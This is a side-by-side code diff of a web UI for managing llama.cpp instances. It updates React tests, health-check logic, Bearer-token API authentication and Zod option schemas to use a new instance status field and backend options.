const errorMessage = 'Instance already exists' const errorMessage = "Instance already exists";
vi.mocked(instancesApi.create).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.create).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('create-instance').click() screen.getByTestId("create-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.queryByTestId('instance-new-instance')).not.toBeInTheDocument() expect(
}) screen.queryByTestId("instance-new-instance")
}) ).not.toBeInTheDocument();
});
});
describe('Update Instance', () => { describe("Update Instance", () => {
it('updates instance and maintains it in state', async () => { it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: 'instance1', name: "instance1",
running: true, status: "running",
options: { model: 'updated.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
} };
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance) vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('update-instance').click() screen.getByTestId("update-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('instance1', { model: 'updated.gguf' }) expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
}) backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
});
});
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId('instance-instance1')).toBeInTheDocument() expect(screen.getByTestId("instance-instance1")).toBeInTheDocument();
}) });
}) });
}) });
describe('Start/Stop Instance', () => { describe("Start/Stop Instance", () => {
it('starts existing instance and updates its running state', async () => { it("starts existing instance and updates its running state", async () => {
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance) vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running // instance2 starts as not running
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:false') expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
}) "instance2:stopped"
);
});
// Start instance2 (button already configured to start instance2) // Start instance2 (button already configured to start instance2)
screen.getByTestId('start-instance').click() screen.getByTestId("start-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.start).toHaveBeenCalledWith('instance2') expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true // The running state should be updated to true
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:true') expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
}) "instance2:running"
}) );
});
});
it('stops instance and updates running state to false', async () => { it("stops instance and updates running state to false", async () => {
vi.mocked(instancesApi.stop).mockResolvedValue({} as Instance) vi.mocked(instancesApi.stop).mockResolvedValue({} as Instance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running // instance1 starts as running
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:true') expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
}) "instance1:running"
);
});
// Stop instance1 (button already configured to stop instance1) // Stop instance1 (button already configured to stop instance1)
screen.getByTestId('stop-instance').click() screen.getByTestId("stop-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.stop).toHaveBeenCalledWith('instance1') expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false // The running state should be updated to false
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:false') expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
}) "instance1:stopped"
}) );
});
});
it('handles start instance error', async () => { it("handles start instance error", async () => {
const errorMessage = 'Failed to start instance' const errorMessage = "Failed to start instance";
vi.mocked(instancesApi.start).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.start).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
}) });
screen.getByTestId('start-instance').click() screen.getByTestId("start-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
}) });
}) });
describe('Delete Instance', () => { describe("Delete Instance", () => {
it('deletes instance and removes it from state', async () => { it("deletes instance and removes it from state", async () => {
vi.mocked(instancesApi.delete).mockResolvedValue(undefined) vi.mocked(instancesApi.delete).mockResolvedValue(undefined);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId('instance-instance2')).toBeInTheDocument() expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
}) });
screen.getByTestId('delete-instance').click() screen.getByTestId("delete-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.delete).toHaveBeenCalledWith('instance2') expect(instancesApi.delete).toHaveBeenCalledWith("instance2");
}) });
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('1') expect(screen.getByTestId("instances-count")).toHaveTextContent("1");
expect(screen.queryByTestId('instance-instance2')).not.toBeInTheDocument() expect(
expect(screen.getByTestId('instance-instance1')).toBeInTheDocument() // instance1 should still exist screen.queryByTestId("instance-instance2")
}) ).not.toBeInTheDocument();
}) expect(screen.getByTestId("instance-instance1")).toBeInTheDocument(); // instance1 should still exist
});
});
it('handles delete instance error without changing state', async () => { it("handles delete instance error without changing state", async () => {
const errorMessage = 'Instance is running' const errorMessage = "Instance is running";
vi.mocked(instancesApi.delete).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.delete).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('delete-instance').click() screen.getByTestId("delete-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId('instance-instance2')).toBeInTheDocument() expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
}) });
}) });
describe('Error Management', () => { describe("Error Management", () => {
it('clears error when clearError is called', async () => { it("clears error when clearError is called", async () => {
const errorMessage = 'Test error' const errorMessage = "Test error";
vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
screen.getByTestId('clear-error').click() screen.getByTestId("clear-error").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent('no-error') expect(screen.getByTestId("error")).toHaveTextContent("no-error");
}) });
}) });
}) });
describe('State Consistency', () => { describe("State Consistency", () => {
it('maintains consistent state during multiple operations', async () => { it("maintains consistent state during multiple operations", async () => {
// Test that operations don't interfere with each other // Test that operations don't interfere with each other
const newInstance: Instance = { const newInstance: Instance = {
name: 'new-instance', name: "new-instance",
running: false, status: "stopped",
options: {} options: {},
} };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance) vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance) vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
// Create new instance // Create new instance
screen.getByTestId('create-instance').click() screen.getByTestId("create-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('3') expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
}) });
// Start an instance (this should not affect the count) // Start an instance (this should not affect the count)
screen.getByTestId('start-instance').click() screen.getByTestId("start-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.start).toHaveBeenCalled() expect(instancesApi.start).toHaveBeenCalled();
expect(screen.getByTestId('instances-count')).toHaveTextContent('3') // Still 3 expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change // But the running state should change
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:true') expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
}) "instance2:running"
}) );
}) });
}) });
});
});

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts // ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react' import { useState, useEffect } from 'react'
import type { HealthStatus } from '@/types/instance' import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService' import { healthService } from '@/lib/healthService'
export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined { export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>() const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => { useEffect(() => {
if (!isRunning) { if (instanceStatus === "stopped") {
setHealth(undefined) setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return return
} }
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus) setHealth(healthStatus)
}) })
// Cleanup subscription on unmount or when running changes // Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe return unsubscribe
}, [instanceName, isRunning]) }, [instanceName, instanceStatus])
return health return health
} }

View File

@@ -10,18 +10,31 @@ async function apiCall<T>(
): Promise<T> { ): Promise<T> {
const url = `${API_BASE}${endpoint}`; const url = `${API_BASE}${endpoint}`;
// Prepare headers // Get auth token from sessionStorage (same as AuthContext)
const headers: HeadersInit = { const storedKey = sessionStorage.getItem('llamactl_management_key');
// Prepare headers with auth
const headers: Record<string, string> = {
"Content-Type": "application/json", "Content-Type": "application/json",
...options.headers, ...(options.headers as Record<string, string>),
}; };
// Add auth header if available
if (storedKey) {
headers['Authorization'] = `Bearer ${storedKey}`;
}
try { try {
const response = await fetch(url, { const response = await fetch(url, {
...options, ...options,
headers, headers,
}); });
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required');
}
if (!response.ok) { if (!response.ok) {
// Try to get error message from response // Try to get error message from response
let errorMessage = `HTTP ${response.status}`; let errorMessage = `HTTP ${response.status}`;
@@ -47,7 +60,7 @@ async function apiCall<T>(
const text = await response.text(); const text = await response.text();
return text as T; return text as T;
} else { } else {
const data = await response.json(); const data = await response.json() as T;
return data; return data;
} }
} catch (error) { } catch (error) {
@@ -121,4 +134,7 @@ export const instancesApi = {
const params = lines ? `?lines=${lines}` : ""; const params = lines ? `?lines=${lines}` : "";
return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text"); return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
}, },
// GET /instances/{name}/proxy/health
getHealth: (name: string) => apiCall<any>(`/instances/${name}/proxy/health`),
}; };

View File

@@ -1,4 +1,5 @@
import { type HealthStatus } from '@/types/instance' import { type HealthStatus } from '@/types/instance'
import { instancesApi } from '@/lib/api'
type HealthCallback = (health: HealthStatus) => void type HealthCallback = (health: HealthStatus) => void
@@ -8,31 +9,33 @@ class HealthService {
async checkHealth(instanceName: string): Promise<HealthStatus> { async checkHealth(instanceName: string): Promise<HealthStatus> {
try { try {
const response = await fetch(`/api/v1/instances/${instanceName}/proxy/health`) await instancesApi.getHealth(instanceName)
if (response.status === 200) { return {
return { status: 'ok',
status: 'ok', lastChecked: new Date()
lastChecked: new Date() }
} catch (error) {
if (error instanceof Error) {
// Check if it's a 503 (service unavailable - loading)
if (error.message.includes('503')) {
return {
status: 'loading',
message: 'Instance is starting up',
lastChecked: new Date()
}
} }
} else if (response.status === 503) {
const data = await response.json()
return {
status: 'loading',
message: data.error.message,
lastChecked: new Date()
}
} else {
return { return {
status: 'error', status: 'error',
message: `HTTP ${response.status}`, message: error.message,
lastChecked: new Date() lastChecked: new Date()
} }
} }
} catch (error) {
return { return {
status: 'error', status: 'error',
message: 'Network error', message: 'Unknown error',
lastChecked: new Date() lastChecked: new Date()
} }
} }
@@ -82,7 +85,7 @@ class HealthService {
}, 60000) }, 60000)
this.intervals.set(instanceName, interval) this.intervals.set(instanceName, interval)
}, 2000) }, 5000)
} }
private stopHealthCheck(instanceName: string): void { private stopHealthCheck(instanceName: string): void {

View File

@@ -1,8 +1,7 @@
import type { CreateInstanceOptions} from '@/schemas/instanceOptions'; import { type CreateInstanceOptions, type BackendOptions, getAllFieldKeys, getAllBackendFieldKeys } from '@/schemas/instanceOptions'
import { getAllFieldKeys } from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default // Instance-level basic fields (not backend-specific)
export const basicFieldsConfig: Record<string, { export const basicFieldsConfig: Record<string, {
label: string label: string
description?: string description?: string
placeholder?: string placeholder?: string
@@ -22,6 +21,28 @@ export const basicFieldsConfig: Record<string, {
placeholder: '5', placeholder: '5',
description: 'Delay in seconds before attempting restart' description: 'Delay in seconds before attempting restart'
}, },
idle_timeout: {
label: 'Idle Timeout (minutes)',
placeholder: '60',
description: 'Time in minutes before instance is considered idle and stopped'
},
on_demand_start: {
label: 'On-Demand Start',
description: 'Start instance upon receiving OpenAI-compatible API request'
},
backend_type: {
label: 'Backend Type',
description: 'Type of backend to use for this instance'
}
}
// Backend-specific basic fields (these go in backend_options)
export const basicBackendFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
required?: boolean
}> = {
model: { model: {
label: 'Model Path', label: 'Model Path',
placeholder: '/path/to/model.gguf', placeholder: '/path/to/model.gguf',
@@ -48,6 +69,10 @@ export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig return key in basicFieldsConfig
} }
export function isBasicBackendField(key: keyof BackendOptions): boolean {
return key in basicBackendFieldsConfig
}
export function getBasicFields(): (keyof CreateInstanceOptions)[] { export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[] return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
} }
@@ -56,5 +81,13 @@ export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key)) return getAllFieldKeys().filter(key => !isBasicField(key))
} }
export function getBasicBackendFields(): (keyof BackendOptions)[] {
return Object.keys(basicBackendFieldsConfig) as (keyof BackendOptions)[]
}
export function getAdvancedBackendFields(): (keyof BackendOptions)[] {
return getAllBackendFieldKeys().filter(key => !isBasicBackendField(key))
}
// Re-export the Zod-based functions // Re-export the Zod-based functions
export { getFieldType } from '@/schemas/instanceOptions' export { getFieldType, getBackendFieldType } from '@/schemas/instanceOptions'

View File

@@ -3,11 +3,14 @@ import ReactDOM from 'react-dom/client'
import App from './App' import App from './App'
import { InstancesProvider } from './contexts/InstancesContext' import { InstancesProvider } from './contexts/InstancesContext'
import './index.css' import './index.css'
import { AuthProvider } from './contexts/AuthContext'
ReactDOM.createRoot(document.getElementById('root')!).render( ReactDOM.createRoot(document.getElementById('root')!).render(
<React.StrictMode> <React.StrictMode>
<InstancesProvider> <AuthProvider>
<App /> <InstancesProvider>
</InstancesProvider> <App />
</InstancesProvider>
</AuthProvider>
</React.StrictMode>, </React.StrictMode>,
) )

View File

@@ -1,12 +1,8 @@
import { BackendType } from '@/types/instance'
import { z } from 'zod' import { z } from 'zod'
// Define the Zod schema // Define the backend options schema (previously embedded in CreateInstanceOptionsSchema)
export const CreateInstanceOptionsSchema = z.object({ export const BackendOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
// Common params // Common params
verbose_prompt: z.boolean().optional(), verbose_prompt: z.boolean().optional(),
threads: z.number().optional(), threads: z.number().optional(),
@@ -14,12 +10,12 @@ export const CreateInstanceOptionsSchema = z.object({
cpu_mask: z.string().optional(), cpu_mask: z.string().optional(),
cpu_range: z.string().optional(), cpu_range: z.string().optional(),
cpu_strict: z.number().optional(), cpu_strict: z.number().optional(),
priority: z.number().optional(), prio: z.number().optional(),
poll: z.number().optional(), poll: z.number().optional(),
cpu_mask_batch: z.string().optional(), cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(), cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(), cpu_strict_batch: z.number().optional(),
priority_batch: z.number().optional(), prio_batch: z.number().optional(),
poll_batch: z.number().optional(), poll_batch: z.number().optional(),
ctx_size: z.number().optional(), ctx_size: z.number().optional(),
predict: z.number().optional(), predict: z.number().optional(),
@@ -82,7 +78,7 @@ export const CreateInstanceOptionsSchema = z.object({
seed: z.number().optional(), seed: z.number().optional(),
sampling_seq: z.string().optional(), sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(), ignore_eos: z.boolean().optional(),
temperature: z.number().optional(), temp: z.number().optional(),
top_k: z.number().optional(), top_k: z.number().optional(),
top_p: z.number().optional(), top_p: z.number().optional(),
min_p: z.number().optional(), min_p: z.number().optional(),
@@ -109,7 +105,7 @@ export const CreateInstanceOptionsSchema = z.object({
json_schema: z.string().optional(), json_schema: z.string().optional(),
json_schema_file: z.string().optional(), json_schema_file: z.string().optional(),
// Server/Example-specific params // Example-specific params
no_context_shift: z.boolean().optional(), no_context_shift: z.boolean().optional(),
special: z.boolean().optional(), special: z.boolean().optional(),
no_warmup: z.boolean().optional(), no_warmup: z.boolean().optional(),
@@ -149,8 +145,6 @@ export const CreateInstanceOptionsSchema = z.object({
no_prefill_assistant: z.boolean().optional(), no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(), slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(), lora_init_without_apply: z.boolean().optional(),
// Speculative decoding params
draft_max: z.number().optional(), draft_max: z.number().optional(),
draft_min: z.number().optional(), draft_min: z.number().optional(),
draft_p_min: z.number().optional(), draft_p_min: z.number().optional(),
@@ -176,22 +170,57 @@ export const CreateInstanceOptionsSchema = z.object({
fim_qwen_14b_spec: z.boolean().optional(), fim_qwen_14b_spec: z.boolean().optional(),
}) })
// Infer the TypeScript type from the schema // Define the main create instance options schema
export const CreateInstanceOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Backend configuration
backend_type: z.enum([BackendType.LLAMA_CPP]).optional(),
backend_options: BackendOptionsSchema.optional(),
})
// Infer the TypeScript types from the schemas
export type BackendOptions = z.infer<typeof BackendOptionsSchema>
export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema> export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>
// Helper to get all field keys // Helper to get all field keys for CreateInstanceOptions
export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] { export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[] return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
} }
// Helper to get all backend option field keys
export function getAllBackendFieldKeys(): (keyof BackendOptions)[] {
return Object.keys(BackendOptionsSchema.shape) as (keyof BackendOptions)[]
}
// Get field type from Zod schema // Get field type from Zod schema
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' { export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
const fieldSchema = CreateInstanceOptionsSchema.shape[key] const fieldSchema = CreateInstanceOptionsSchema.shape[key]
if (!fieldSchema) return 'text' if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper // Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
if (innerSchema instanceof z.ZodObject) return 'object'
return 'text' // ZodString and others default to text
}
// Get field type for backend options
export function getBackendFieldType(key: keyof BackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = BackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean' if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number' if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array' if (innerSchema instanceof z.ZodArray) return 'array'

View File

@@ -2,14 +2,22 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
export { type CreateInstanceOptions } from '@/schemas/instanceOptions' export { type CreateInstanceOptions } from '@/schemas/instanceOptions'
export const BackendType = {
LLAMA_CPP: 'llama_cpp'
} as const
export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
export type InstanceStatus = 'running' | 'stopped' | 'failed'
export interface HealthStatus { export interface HealthStatus {
status: 'ok' | 'loading' | 'error' | 'unknown' status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string message?: string
lastChecked: Date lastChecked: Date
} }
export interface Instance { export interface Instance {
name: string; name: string;
running: boolean; status: InstanceStatus;
options?: CreateInstanceOptions; options?: CreateInstanceOptions;
} }

13
webui/src/vite-env.d.ts vendored Normal file
View File

@@ -0,0 +1,13 @@
/// <reference types="vite/client" />
declare global {
interface ImportMetaEnv {
readonly VITE_APP_VERSION?: string
}
interface ImportMeta {
readonly env: ImportMetaEnv
}
}
export {}

View File

@@ -18,8 +18,9 @@
"baseUrl": ".", "baseUrl": ".",
"paths": { "paths": {
"@/*": ["./src/*"] "@/*": ["./src/*"]
} },
"types": ["vite/client"]
}, },
"include": ["src"], "include": ["src", "src/vite-env.d.ts"],
"references": [{ "path": "./tsconfig.node.json" }] "references": [{ "path": "./tsconfig.node.json" }]
} }